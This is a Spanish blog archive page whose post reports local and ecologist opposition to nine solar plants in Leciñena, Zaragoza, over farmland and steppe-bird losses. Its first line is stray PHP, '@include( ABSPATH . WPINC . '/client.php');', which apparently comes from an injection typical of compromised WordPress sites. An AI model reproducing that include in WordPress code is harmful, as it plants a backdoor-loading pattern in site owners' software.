@include( ABSPATH . WPINC . '/client.php'); Barracuda » 2021 » enero » 13

Barracuda

Archivos de posts de 13th enero, 2021

LECIÑENA NO SE VENDE

13th enero 2021 | Agricultura,Atentados ecológicos,Energía,Estepas,Política y Sociedad

Leciñena

Val de Recordín, Leciñena, Zaragoza

Vecinos de Leciñena y entidades ecologistas aragonesas se oponen a la instalación de nueve plantas fotovoltaicas en el monte de Leciñena (Zaragoza, Aragón, España) en la comarca de Los Monegros por amenazar la agricultura local y la fauna esteparia de la zona.

Leciñena

Recordín, Leciñena, Zaragoza

Los proyectos Filera I, Filera II, Filera III, Filera IV, Filera V, más Los Leones I, Los Leones II, Los Leones III y Los Leones IV amenazan con sepultar casi mil hectáreas de monte y cultivos de secano en las partidas de Recordín y Valseca, además de alterar brutalmente el territorio con movimientos de tierra para nivelar el terreno y levantar decenas de kilómetros de vallados y de tendidos eléctricos para evacuar la energía.

Leciñena

Avutarda en Valseca, Leciñena, Zaragoza

Las instalaciones ocuparían suelos del ayuntamiento de Leciñena que pretende arrendar para plantas solares de los proyectos Filera tras negociar con la empresa Premier Engineering and Procurement SL, con lo que decenas de agricultores perderían una buena parte de las tierras de cultivo que vienen trabajando ancestralmente y, por tanto, su fuente de ingresos. Los afectados ya han interpuesto litigio vía judicial contra el Ayuntamiento, cuyo alcalde es actualmente Raúl Gracia Solanas (PSOE) (2019-hoy), siendo su antecesor Gonzalo Gavín González (PSOE) (hasta 2019).

Leciñena

Corporación municipal. Fuente: Ayto. Leciñena

Las entidades ecologistas han presentado alegaciones en contra de dichas plantas fotovoltaicas por afectar un área crítica de cernícalo primilla como reconocen los propios estudios de impacto ambiental de la empresa. Pero, además, alegan la presencia de avutarda, sisón, ganga, ortega y rocín o alondra de Dupont, especies protegidas y en peligro por el continuo declive de sus poblaciones (ver: El cernícalo primilla pierde la mitad de sus población aragonesa en la última década/AODA, 2020 y El catastrófico declive de las poblaciones aragonesas del sisón común/AODA, 2020).

Leciñena

Plano con los proyectos Filera y Los Leones

Los ecologistas critican que los proyectos se fraccionen en subproyectos de 49,9 MW, incluso se desliguen de las subestaciones y líneas eléctricas, para evitar una evaluación ambiental rigurosa, lo que supone una estrategia tramposa y fraudulenta. La pérdida de suelo, los vallados y los tendidos eléctricos, además, son incompatibles con la fauna esteparia, manifiestan. A ello se suma la fragmentación de los hábitats, que supone otro factor de pérdida de biodiversidad. En el mapa superior se refleja bien la fragmentación del territorio que conllevan las centrales solares.

Leciñena

Portada del proyecto técnico Filera I

Los ecologistas recuerdan que la energía renovable se debe generar en los lugares de consumo y no en zonas alejadas de éstos ya que en el transporte mediante tendidos eléctricos -letales para la fauna voladora- se pierde un porcentaje notable de la energía, factor que hace al sistema renovable ineficiente; además, las energías renovables deben ser escrupulosamente planificadas y dimensionadas y cumplir los más altos estándares de rigor tanto en los procedimientos administrativos como en la evaluación de los impactos, cosa que no ocurre en estos casos.

Leciñena

Premier Engineering and Procurement. Fuente: Infoempresa

La empresa Premier Engineering and Procurement con la que el Ayuntamiento de Leciñena viene negociando tiene su domicilio social en Plaza y según Infocif se creó en 2015 con 5000 € de capital social y tiene un administrador único en la persona de Javier Abad García y como socio único Premier China Group España SL. No obstante, cada proyecto Filera es promovido por una empresa diferente aunque todas poseen su domicilio social en Calle Serrano 67 PL 6 (Madrid). FILERA I, Promotor: VF RENOVABLES 17, S.L. CIF: B-44520989; FILERA II, Promotor: VF RENOVABLES 18, S.L. CIF: B-44520997; FILERA III, Promotor: ACERSOLAR ENERGIA S.L.U. CIF: B-88353792; FILERA IV, Promotor: COVASOLAR INSTALACIONES S.L.U. CIF: B-88353784 y FILERA V, Promotor: GLOBAL ACTIVOS FOTOVOLTAICOS S.L.U. CIF: B-88353867.

En lo que respecta al negativo impacto de este tipo de instalaciones en el medio natural, los científicos ya vienen advirtiendo del impacto negativo de las renovables sobre la biodiversidad en Aragón, tanto por la mortalidad asociada a las centrales eólicas como por la pérdida de hábitats que generan las fotovoltaicas (ver: Biodiversidad ¿la gran perdedora de la transición energética?/BOLONIO, L., 2020).

Anímate a hacer un comentario


ÚLTIMOS COMENTARIOS

LO MÁS RECIENTE

LO MÁS VISITADO

Tienda Barracuda

ARTÍCULOS POR CATEGORÍAS

CALENDARIO DE ARTÍCULOS

enero 2021
L M X J V S D
« dic    
 123
45678910
11121314151617
18192021222324
25262728293031

ARTÍCULOS POR MESES

PÁGINAS